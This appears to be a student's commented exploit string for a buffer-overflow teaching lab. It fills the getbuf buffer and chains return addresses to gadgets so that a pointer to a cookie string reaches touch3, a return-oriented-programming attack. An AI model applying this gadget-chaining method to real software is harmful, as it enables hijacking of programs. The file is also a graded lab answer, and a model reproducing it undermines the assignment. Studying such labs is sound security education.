41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 /* fill in the 40 slots in the getbuf buffer */
ab 19 40 00 00 00 00 00 /* return address to addval_219 for popq %rax */
20 00 00 00 00 00 00 00 /* 32 bias, which is loaded into %rax */
dd 19 40 00 00 00 00 00 /* return address to getval_481 for movl %eax, %edx */
34 1a 40 00 00 00 00 00 /* return address to getval_159 for movl %edx, %ecx, cmpb %cl, %cl is also ran but no harm */
13 1a 40 00 00 00 00 00 /* return address to addval_436 for movl %ecx, %edi, nop is also ran twice but no harm */
06 1a 40 00 00 00 00 00 /* return address to addval_190 for movq %rsp, %rax */
c5 19 40 00 00 00 00 00 /* return address to setval_426 for movq %rax, %rdi */
d6 19 40 00 00 00 00 00 /* return address to add_xy for lea (%rdi,%rsi,1),%rax    smart ass there is one whole command in function add_xy that we can use */
c5 19 40 00 00 00 00 00 /* return address to setval_426 for movq %rax, %rdi */
fa 18 40 00 00 00 00 00 /* return address to the touch3 */
35 39 62 39 39 37 66 61 00 /* the string of cookie data */ 